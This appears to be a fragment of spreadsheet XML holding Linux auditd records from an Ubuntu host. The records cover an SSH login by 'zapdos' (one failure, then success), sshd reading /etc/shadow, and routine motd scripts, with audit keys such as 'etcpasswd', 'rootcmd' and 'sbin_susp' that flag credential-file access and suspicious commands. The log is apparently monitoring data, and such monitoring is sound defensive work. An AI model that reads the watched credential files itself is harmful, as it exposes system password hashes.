    <t>item=0 name=(null) inode=1713598 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713599 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713600 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=1713601 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2254132 dev=08:01 mode=0100000 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/share/doc/python-pip/changelog.Debian.gz.dpkg-new" inode=1713602 dev=08:01 mode=0120777 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/share/doc/python-pip/changelog.Debian.gz.dpkg-tmp" inode=1713603 dev=08:01 mode=0120777 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/share/man/man1/pip2.1.gz.dpkg-new" inode=2254134 dev=08:01 mode=0120777 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/share/man/man1/pip2.1.gz.dpkg-tmp" inode=2254160 dev=08:01 mode=0120777 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2254181 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name=(null) inode=2254190 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/chmod" inode=2228253 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/" inode=2 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/bin/systemctl" inode=2228384 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/run/systemd/sessions/" inode=596 dev=00:17 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=1 name="/run/systemd/sessions/6.ref" inode=825 dev=00:17 mode=010600 ouid=0 ogid=0 rdev=00:00 nametype=CREATE cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/sbin/run-parts" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/bin/run-parts" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/sbin/run-parts" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/run-parts" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/sbin/run-parts" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/var/log/" inode=2101343 dev=08:01 mode=040775 ouid=0 ogid=106 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/run/systemd/inhibit/" inode=698 dev=00:17 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=1 name="/run/systemd/inhibit/16.ref" inode=925 dev=00:17 mode=010600 ouid=0 ogid=0 rdev=00:00 nametype=CREATE cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=1 name="/run/systemd/inhibit/17.ref" inode=908 dev=00:17 mode=010600 ouid=0 ogid=0 rdev=00:00 nametype=CREATE cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=1 name="/run/systemd/inhibit/18.ref" inode=927 dev=00:17 mode=010600 ouid=0 ogid=0 rdev=00:00 nametype=CREATE cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/sbin/dpkg-split" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/bin/dpkg-split" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/sbin/dpkg-split" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/sbin/dpkg-deb" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/bin/dpkg-deb" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/sbin/dpkg-deb" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/sbin/tar" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/bin/tar" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/sbin/tar" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/tar" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/sbin/tar" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/sbin/dpkg-query" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/bin/dpkg-query" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/sbin/dpkg-query" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/sbin/rm" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/local/bin/rm" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/sbin/rm" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/usr/bin/rm" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>item=0 name="/sbin/rm" nametype=UNKNOWN cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0</t>
  </si>
  <si>
    <t>arch=c000003e</t>
  </si>
  <si>
    <t>syscall=59</t>
  </si>
  <si>
    <t>success=yes</t>
  </si>
  <si>
    <t>exit=0</t>
  </si>
  <si>
    <t>a0=55999367f7d0</t>
  </si>
  <si>
    <t>a1=559993670fa0</t>
  </si>
  <si>
    <t>a2=5599936806d0</t>
  </si>
  <si>
    <t>a3=559993645010</t>
  </si>
  <si>
    <t>items=2</t>
  </si>
  <si>
    <t>ppid=2092</t>
  </si>
  <si>
    <t>pid=2204</t>
  </si>
  <si>
    <t>auid=1000</t>
  </si>
  <si>
    <t>uid=0</t>
  </si>
  <si>
    <t>gid=0</t>
  </si>
  <si>
    <t>euid=0</t>
  </si>
  <si>
    <t>suid=0</t>
  </si>
  <si>
    <t>fsuid=0</t>
  </si>
  <si>
    <t>egid=0</t>
  </si>
  <si>
    <t>sgid=0</t>
  </si>
  <si>
    <t>fsgid=0</t>
  </si>
  <si>
    <t>tty=pts0</t>
  </si>
  <si>
    <t>ses=4</t>
  </si>
  <si>
    <t>comm="ifconfig"</t>
  </si>
  <si>
    <t>exe="/sbin/ifconfig"</t>
  </si>
  <si>
    <t>key="sbin_susp"</t>
  </si>
  <si>
    <t>argc=1</t>
  </si>
  <si>
    <t>a0="ifconfig"</t>
  </si>
  <si>
    <t>item=0</t>
  </si>
  <si>
    <t>name="/sbin/ifconfig"</t>
  </si>
  <si>
    <t>inode=917525</t>
  </si>
  <si>
    <t>dev=08:01 mode=0100755</t>
  </si>
  <si>
    <t>ouid=0</t>
  </si>
  <si>
    <t>ogid=0</t>
  </si>
  <si>
    <t>rdev=00:00 nametype=NORMAL</t>
  </si>
  <si>
    <t>cap_fp=0</t>
  </si>
  <si>
    <t>cap_fi=0</t>
  </si>
  <si>
    <t>cap_fe=0</t>
  </si>
  <si>
    <t>cap_fver=0</t>
  </si>
  <si>
    <t>item=1</t>
  </si>
  <si>
    <t>name="/lib64/ld-linux-x86-64.so.2" inode=267405</t>
  </si>
  <si>
    <t>a0=55d60bcba990</t>
  </si>
  <si>
    <t>a1=55d60bcc2700</t>
  </si>
  <si>
    <t>a2=55d60bcba9d0</t>
  </si>
  <si>
    <t>a3=fffffff6</t>
  </si>
  <si>
    <t>ppid=1015</t>
  </si>
  <si>
    <t>pid=2229</t>
  </si>
  <si>
    <t>auid=4294967295</t>
  </si>
  <si>
    <t>tty=(none) ses=4294967295</t>
  </si>
  <si>
    <t>comm="sshd"</t>
  </si>
  <si>
    <t>exe="/usr/sbin/sshd"</t>
  </si>
  <si>
    <t>key="rootcmd"</t>
  </si>
  <si>
    <t>argc=3</t>
  </si>
  <si>
    <t>a0="/usr/sbin/sshd"</t>
  </si>
  <si>
    <t>a1="-D" a2="-R"</t>
  </si>
  <si>
    <t>name="/usr/sbin/sshd"</t>
  </si>
  <si>
    <t>inode=1457590</t>
  </si>
  <si>
    <t>syscall=257</t>
  </si>
  <si>
    <t>exit=4</t>
  </si>
  <si>
    <t>a0=ffffff9c</t>
  </si>
  <si>
    <t>a1=7f377a3722a3</t>
  </si>
  <si>
    <t>a2=80000</t>
  </si>
  <si>
    <t>a3=0</t>
  </si>
  <si>
    <t>items=1</t>
  </si>
  <si>
    <t>key="etcpasswd"</t>
  </si>
  <si>
    <t>name="/etc/shadow"</t>
  </si>
  <si>
    <t>inode=2371212</t>
  </si>
  <si>
    <t>dev=08:01 mode=0100640</t>
  </si>
  <si>
    <t>ogid=42</t>
  </si>
  <si>
    <t>ses=4294967295</t>
  </si>
  <si>
    <t>msg='op=PAM:authentication acct="zapdos"</t>
  </si>
  <si>
    <t>hostname=192.168.0.102 addr=192.168.0.102 terminal=ssh</t>
  </si>
  <si>
    <t>res=failed'</t>
  </si>
  <si>
    <t>a1=564976a34370</t>
  </si>
  <si>
    <t>a2=401</t>
  </si>
  <si>
    <t>key="session"</t>
  </si>
  <si>
    <t>name="/var/log/btmp"</t>
  </si>
  <si>
    <t>inode=2101630</t>
  </si>
  <si>
    <t>dev=08:01 mode=0100660</t>
  </si>
  <si>
    <t>ogid=43</t>
  </si>
  <si>
    <t>msg='op=login</t>
  </si>
  <si>
    <t>acct="zapdos"</t>
  </si>
  <si>
    <t>hostname=? addr=192.168.0.102 terminal=sshd</t>
  </si>
  <si>
    <t>res=success'</t>
  </si>
  <si>
    <t>msg='op=PAM:accounting acct="zapdos"</t>
  </si>
  <si>
    <t>msg='op=PAM:setcred acct="zapdos"</t>
  </si>
  <si>
    <t>old-auid=4294967295</t>
  </si>
  <si>
    <t>tty=(none) old-ses=4294967295</t>
  </si>
  <si>
    <t>ses=6</t>
  </si>
  <si>
    <t>res=1</t>
  </si>
  <si>
    <t>syscall=133</t>
  </si>
  <si>
    <t>a0=560ba1a19d80</t>
  </si>
  <si>
    <t>a1=1180</t>
  </si>
  <si>
    <t>a2=0</t>
  </si>
  <si>
    <t>a3=ffffffff</t>
  </si>
  <si>
    <t>ppid=1</t>
  </si>
  <si>
    <t>pid=815</t>
  </si>
  <si>
    <t>comm="systemd-logind" exe="/lib/systemd/systemd-logind" key="specialfiles"</t>
  </si>
  <si>
    <t>name="/run/systemd/sessions/"</t>
  </si>
  <si>
    <t>inode=596</t>
  </si>
  <si>
    <t>dev=00:17 mode=040755</t>
  </si>
  <si>
    <t>rdev=00:00 nametype=PARENT</t>
  </si>
  <si>
    <t>name="/run/systemd/sessions/6.ref" inode=825</t>
  </si>
  <si>
    <t>dev=00:17 mode=010600</t>
  </si>
  <si>
    <t>rdev=00:00 nametype=CREATE</t>
  </si>
  <si>
    <t>a0=7f377c5b2e9a</t>
  </si>
  <si>
    <t>a1=7fff28eb7d00</t>
  </si>
  <si>
    <t>a2=5649771a0a00</t>
  </si>
  <si>
    <t>a3=8</t>
  </si>
  <si>
    <t>ppid=2229</t>
  </si>
  <si>
    <t>pid=2299</t>
  </si>
  <si>
    <t>tty=(none) ses=6</t>
  </si>
  <si>
    <t>comm="sh"</t>
  </si>
  <si>
    <t>exe="/bin/dash"</t>
  </si>
  <si>
    <t>a0="sh"</t>
  </si>
  <si>
    <t>a1="-c" a2=2F7573722F62696E2F656E76202D6920504154483D2F7573722F6C6F63616C2F7362696E3A2F7573722F6C6F63616C2F62696E3A2F7573722F7362696E3A2F7573722F62696E3A2F7362696E3A2F62696E2072756E2D7061727473202D2D6C7362737973696E6974202F6574632F7570646174652D6D6F74642E64203E202F72756E2F6D6F74642E64796E616D69632E6E6577</t>
  </si>
  <si>
    <t>name="/bin/sh"</t>
  </si>
  <si>
    <t>inode=2228258</t>
  </si>
  <si>
    <t>a0=55ebe91cfc80</t>
  </si>
  <si>
    <t>a1=55ebe93db578</t>
  </si>
  <si>
    <t>a2=55ebe93db5d8</t>
  </si>
  <si>
    <t>a3=7f1619d5b810</t>
  </si>
  <si>
    <t>ppid=2299</t>
  </si>
  <si>
    <t>pid=2300</t>
  </si>
  <si>
    <t>comm="env"</t>
  </si>
  <si>
    <t>exe="/usr/bin/env"</t>
  </si>
  <si>
    <t>argc=6</t>
  </si>
  <si>
    <t>a0="/usr/bin/env"</t>
  </si>
  <si>
    <t>a1="-i" a2="PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" a3="run-parts" a4="--lsbsysinit" a5="/etc/update-motd.d"</t>
  </si>
  <si>
    <t>name="/usr/bin/env"</t>
  </si>
  <si>
    <t>inode=1442056</t>
  </si>
  <si>
    <t>success=no</t>
  </si>
  <si>
    <t>exit=-2 a0=7ffe716f6bf0</t>
  </si>
  <si>
    <t>a1=7ffe716f6e20</t>
  </si>
  <si>
    <t>a2=5653b5d64400</t>
  </si>
  <si>
    <t>a3=7f1a47a771c0</t>
  </si>
  <si>
    <t>name="/usr/local/sbin/run-parts" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>name="/usr/local/bin/run-parts" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>name="/usr/sbin/run-parts" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>name="/usr/bin/run-parts" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>name="/sbin/run-parts" nametype=UNKNOWN</t>
  </si>
  <si>
    <t>a0=7ffe716f6bf0</t>
  </si>
  <si>
    <t>comm="run-parts" exe="/bin/run-parts" key="rootcmd"</t>
  </si>
  <si>
    <t>a0="run-parts" a1="--lsbsysinit" a2="/etc/update-motd.d"</t>
  </si>
  <si>
    <t>name="/bin/run-parts" inode=2228367</t>
  </si>
  <si>
    <t>a0=55c161762d00</t>
  </si>
  <si>
    <t>a1=55c16175e260</t>
  </si>
  <si>
    <t>a2=7ffe6e1f8208</t>
  </si>
  <si>
    <t>items=3</t>
  </si>
  <si>
    <t>ppid=2300</t>
  </si>
  <si>
    <t>pid=2301</t>
  </si>
  <si>
    <t>comm="00-header" exe="/bin/dash"</t>
  </si>
  <si>
    <t>argc=2</t>
  </si>
  <si>
    <t>a0="/bin/sh"</t>
  </si>
  <si>
    <t>a1="/etc/update-motd.d/00-header"</t>
  </si>
  <si>
    <t>name="/etc/update-motd.d/00-header" inode=2361837</t>
  </si>
  <si>
    <t>item=2</t>
  </si>
  <si>
    <t>a0=5628219444f0</t>
  </si>
  <si>
    <t>a1=5628219444c0</t>
  </si>
  <si>
    <t>a2=5628219444d8</t>
  </si>
  <si>
    <t>a3=562821944010</t>
  </si>
  <si>
    <t>ppid=2301</t>
  </si>
  <si>
    <t>pid=2302</t>
  </si>
  <si>
    <t>comm="uname"</t>
  </si>
  <si>
    <t>exe="/bin/uname"</t>
  </si>
  <si>
    <t>a0="uname"</t>
  </si>
  <si>
    <t>a1="-o"</t>
  </si>
  <si>
    <t>name="/bin/uname"</t>
  </si>
  <si>
    <t>inode=2228402</t>
  </si>
  <si>
    <t>a0=562821944510</t>
  </si>
  <si>
    <t>a1=5628219444e0</t>
  </si>
  <si>
    <t>a2=5628219444f8</t>
  </si>
  <si>
    <t>pid=2303</t>
  </si>
  <si>
    <t>a1="-r"</t>
  </si>
  <si>
    <t>a0=5628219446e8</t>
  </si>
  <si>
    <t>a1=562821944508</t>
  </si>
  <si>
    <t>a2=562821944520</t>
  </si>
  <si>
    <t>pid=2304</t>
  </si>
  <si>
    <t>a1="-m"</t>
  </si>
  <si>
    <t>pid=2305</t>
  </si>
  <si>
    <t>comm="10-help-text" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/etc/update-motd.d/10-help-text"</t>
  </si>
  <si>
    <t>name="/etc/update-motd.d/10-help-text" inode=2361838</t>
  </si>
  <si>
    <t>pid=2306</t>
  </si>
  <si>
    <t>comm="50-motd-news" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/etc/update-motd.d/50-motd-news"</t>
  </si>
  <si>
    <t>name="/etc/update-motd.d/50-motd-news" inode=2361839</t>
  </si>
  <si>
    <t>a0=55f120b4fa78</t>
  </si>
  <si>
    <t>a1=55f120b4fa40</t>
  </si>
  <si>
    <t>a2=55f120b4fa60</t>
  </si>
  <si>
    <t>a3=55f120b4f010</t>
  </si>
  <si>
    <t>ppid=2306</t>
  </si>
  <si>
    <t>pid=2310</t>
  </si>
  <si>
    <t>comm="cut"</t>
  </si>
  <si>
    <t>exe="/usr/bin/cut"</t>
  </si>
  <si>
    <t>a0="cut"</t>
  </si>
  <si>
    <t>a1="-c" a2="-80"</t>
  </si>
  <si>
    <t>name="/usr/bin/cut"</t>
  </si>
  <si>
    <t>inode=1441984</t>
  </si>
  <si>
    <t>a0=55f120b4fa98</t>
  </si>
  <si>
    <t>a1=55f120b4fa60</t>
  </si>
  <si>
    <t>a2=55f120b4fa80</t>
  </si>
  <si>
    <t>pid=2309</t>
  </si>
  <si>
    <t>comm="tr"</t>
  </si>
  <si>
    <t>exe="/usr/bin/tr"</t>
  </si>
  <si>
    <t>a0="tr"</t>
  </si>
  <si>
    <t>a1="-d" a2="\000-\011\013\014\016-\037"</t>
  </si>
  <si>
    <t>name="/usr/bin/tr"</t>
  </si>
  <si>
    <t>inode=1443121</t>
  </si>
  <si>
    <t>pid=2308</t>
  </si>
  <si>
    <t>comm="head"</t>
  </si>
  <si>
    <t>exe="/usr/bin/head"</t>
  </si>
  <si>
    <t>a0="head"</t>
  </si>
  <si>
    <t>a1="-n" a2="10"</t>
  </si>
  <si>
    <t>name="/usr/bin/head"</t>
  </si>
  <si>
    <t>inode=1442284</t>
  </si>
  <si>
    <t>a0=55f120b4fa70</t>
  </si>
  <si>
    <t>a2=55f120b4fa58</t>
  </si>
  <si>
    <t>a3=55f11f3a7962</t>
  </si>
  <si>
    <t>pid=2307</t>
  </si>
  <si>
    <t>comm="cat"</t>
  </si>
  <si>
    <t>exe="/bin/cat"</t>
  </si>
  <si>
    <t>a0="cat"</t>
  </si>
  <si>
    <t>a1="/var/cache/motd-news"</t>
  </si>
  <si>
    <t>name="/bin/cat"</t>
  </si>
  <si>
    <t>inode=2228249</t>
  </si>
  <si>
    <t>pid=2311</t>
  </si>
  <si>
    <t>comm="80-esm" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/etc/update-motd.d/80-esm"</t>
  </si>
  <si>
    <t>name="/etc/update-motd.d/80-esm" inode=2361840</t>
  </si>
  <si>
    <t>a0=558eeae93c08</t>
  </si>
  <si>
    <t>a1=558eeae93bd8</t>
  </si>
  <si>
    <t>a2=558eeae93bf0</t>
  </si>
  <si>
    <t>a3=558eeb216010</t>
  </si>
  <si>
    <t>ppid=2311</t>
  </si>
  <si>
    <t>pid=2312</t>
  </si>
  <si>
    <t>comm="lsb_release"</t>
  </si>
  <si>
    <t>exe="/usr/bin/python3.6" key="rootcmd"</t>
  </si>
  <si>
    <t>argc=4</t>
  </si>
  <si>
    <t>a0="/usr/bin/python3"</t>
  </si>
  <si>
    <t>a1="-Es" a2="/usr/bin/lsb_release"</t>
  </si>
  <si>
    <t>a3="-cs"</t>
  </si>
  <si>
    <t>name="/usr/bin/lsb_release"</t>
  </si>
  <si>
    <t>inode=1442439</t>
  </si>
  <si>
    <t>name="/usr/bin/python3"</t>
  </si>
  <si>
    <t>inode=1442919</t>
  </si>
  <si>
    <t>a0=558eeae93c10</t>
  </si>
  <si>
    <t>a1=558eeae93be0</t>
  </si>
  <si>
    <t>a2=558eeae93bf8</t>
  </si>
  <si>
    <t>pid=2313</t>
  </si>
  <si>
    <t>a3="-ds"</t>
  </si>
  <si>
    <t>pid=2314</t>
  </si>
  <si>
    <t>comm="80-livepatch" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/etc/update-motd.d/80-livepatch"</t>
  </si>
  <si>
    <t>name="/etc/update-motd.d/80-livepatch" inode=2361841</t>
  </si>
  <si>
    <t>a0=5643ca880c58</t>
  </si>
  <si>
    <t>a1=5643ca880c28</t>
  </si>
  <si>
    <t>a2=5643ca880c40</t>
  </si>
  <si>
    <t>a3=5643ca678962</t>
  </si>
  <si>
    <t>ppid=2314</t>
  </si>
  <si>
    <t>pid=2315</t>
  </si>
  <si>
    <t>a1="/var/cache/ubuntu-advantage-tools/ubuntu-advantage-status.cache"</t>
  </si>
  <si>
    <t>a0=5643cc25f4a0</t>
  </si>
  <si>
    <t>a1=5643cc25f470</t>
  </si>
  <si>
    <t>a2=5643cc25f488</t>
  </si>
  <si>
    <t>ppid=2316</t>
  </si>
  <si>
    <t>pid=2318</t>
  </si>
  <si>
    <t>comm="grep"</t>
  </si>
  <si>
    <t>exe="/bin/grep"</t>
  </si>
  <si>
    <t>a0="grep"</t>
  </si>
  <si>
    <t>a1="^livepatch"</t>
  </si>
  <si>
    <t>name="/bin/grep"</t>
  </si>
  <si>
    <t>inode=2228283</t>
  </si>
  <si>
    <t>a0=5643cc25f598</t>
  </si>
  <si>
    <t>a1=5643cc25f568</t>
  </si>
  <si>
    <t>a2=5643cc25f580</t>
  </si>
  <si>
    <t>ppid=2319</t>
  </si>
  <si>
    <t>pid=2321</t>
  </si>
  <si>
    <t>a1="^livepatch:"</t>
  </si>
  <si>
    <t>a0=5643cc25f618</t>
  </si>
  <si>
    <t>a1=5643cc25f5d8</t>
  </si>
  <si>
    <t>a2=5643cc25f600</t>
  </si>
  <si>
    <t>pid=2322</t>
  </si>
  <si>
    <t>comm="sed"</t>
  </si>
  <si>
    <t>exe="/bin/sed"</t>
  </si>
  <si>
    <t>a0="sed"</t>
  </si>
  <si>
    <t>a1="-r" a2="-n" a3=732C5E6C69766570617463683A20282E2A29242C5C312C70</t>
  </si>
  <si>
    <t>name="/bin/sed"</t>
  </si>
  <si>
    <t>inode=2228369</t>
  </si>
  <si>
    <t>a0=5643cc25f5e8</t>
  </si>
  <si>
    <t>a1=5643cc25f5a8</t>
  </si>
  <si>
    <t>a2=5643cc25f5d0</t>
  </si>
  <si>
    <t>ppid=2323</t>
  </si>
  <si>
    <t>pid=2325</t>
  </si>
  <si>
    <t>a1="-r" a2="-n" a3=2F5E6C69766570617463683A2F2C2F5E5C532F732C5E5B5B3A626C616E6B3A5D5D2B706174636853746174653A20282E2A29242C5C312C70</t>
  </si>
  <si>
    <t>ppid=2326</t>
  </si>
  <si>
    <t>pid=2328</t>
  </si>
  <si>
    <t>a1="-r" a2="-n" a3=2F5E6C69766570617463683A2F2C2F5E5C532F732C5E5B5B3A626C616E6B3A5D5D2B636865636B53746174653A20282E2A29242C5C312C70</t>
  </si>
  <si>
    <t>pid=2329</t>
  </si>
  <si>
    <t>comm="90-updates-avai" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/etc/update-motd.d/90-updates-available"</t>
  </si>
  <si>
    <t>name="/etc/update-motd.d/90-updates-available" inode=2361842</t>
  </si>
  <si>
    <t>a0=5573ed35a420</t>
  </si>
  <si>
    <t>a1=5573ed35a3f0</t>
  </si>
  <si>
    <t>a2=5573ed35a408</t>
  </si>
  <si>
    <t>a3=7fe518c4c810</t>
  </si>
  <si>
    <t>ppid=2329</t>
  </si>
  <si>
    <t>pid=2330</t>
  </si>
  <si>
    <t>a1="/var/lib/update-notifier/updates-available"</t>
  </si>
  <si>
    <t>pid=2331</t>
  </si>
  <si>
    <t>comm="91-release-upgr" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="/etc/update-motd.d/91-release-upgrade"</t>
  </si>
  <si>
    <t>name="/etc/update-motd.d/91-release-upgrade" inode=2361843</t>
  </si>
  <si>
    <t>a0=56420ff454e0</t>
  </si>
  <si>
    <t>a1=56420ff454a8</t>
  </si>
  <si>
    <t>a2=56420ff454c8</t>
  </si>
  <si>
    <t>a3=56420ff45010</t>
  </si>
  <si>
    <t>ppid=2332</t>
  </si>
  <si>
    <t>pid=2334</t>
  </si>
  <si>
    <t>a1=2D6420</t>
  </si>
  <si>
    <t>a2="-f4"</t>
  </si>
  <si>
    <t>a0=56420ff454c8</t>
  </si>
  <si>
    <t>a1=56420ff45498</t>
  </si>
  <si>
    <t>a2=56420ff454b0</t>
  </si>
  <si>
    <t>pid=2333</t>
  </si>
  <si>
    <t>a3="-sd"</t>
  </si>
  <si>
    <t>a0=56420ff45328</t>
  </si>
  <si>
    <t>a1=56420ff45380</t>
  </si>
  <si>
    <t>a2=56420ff45390</t>
  </si>
  <si>
    <t>comm="release-upgrade" exe="/bin/dash"</t>
  </si>
  <si>
    <t>a1="-e" a2="/usr/lib/ubuntu-release-upgrader/release-upgrade-motd"</t>
  </si>
  <si>
    <t>name="/usr/lib/ubuntu-release-upgrader/release-upgrade-motd" inode=1450998</t>
  </si>
  <si>
    <t>a0=564936d39d50</t>
  </si>
  <si>
    <t>a1=564936d39d20</t>
  </si>
  <si>
    <t>a2=564936d39d38</t>
  </si>
  <si>
    <t>a3=564936d39010</t>
  </si>
  <si>
    <t>ppid=2331</t>
  </si>
  <si>
    <t>pid=2335</t>
  </si>
  <si>
    <t>comm="date"</t>
  </si>
  <si>
    <t>exe="/bin/date"</t>
  </si>
  <si>
    <t>a0="date"</t>
  </si>
  <si>
    <t>a1="+%s"</t>
  </si>
  <si>
    <t>name="/bin/date"</t>
  </si>
  <si>
    <t>inode=2228259</t>
  </si>
  <si>
    <t>a0=564936d39df0</t>
  </si>
  <si>
    <t>a1=564936d39db0</t>
  </si>
  <si>
    <t>a2=564936d39dd8</t>
  </si>
  <si>
    <t>a3=56493662f962</t>
  </si>
  <si>
    <t>pid=2336</t>
  </si>
  <si>
    <t>comm="stat"</t>
  </si>
  <si>
    <t>exe="/usr/bin/stat"</t>
  </si>
  <si>
    <t>a0="stat"</t>
  </si>
  <si>
    <t>a1="-c" a2="%Y" a3="/var/lib/ubuntu-release-upgrader/release-upgrade-available"</t>
  </si>
  <si>
    <t>name="/usr/bin/stat"</t>
  </si>
  <si>
    <t>inode=1443058</t>
  </si>
  <si>
    <t>a0=564936d39da0</t>
  </si>
  <si>
    <t>a1=564936d39d60</t>
  </si>
  <si>
    <t>a2=564936d39d88</t>
  </si>
  <si>
    <t>pid=2337</t>
  </si>
  <si>
    <t>comm="expr"</t>
  </si>
  <si>
    <t>exe="/usr/bin/expr"</t>
  </si>
  <si>
    <t>a0="expr"</t>
  </si>
  <si>
    <t>a1="1584753465"</t>
  </si>
  <si>
    <t>a2="+" a3="86400"</t>
  </si>
  <si>
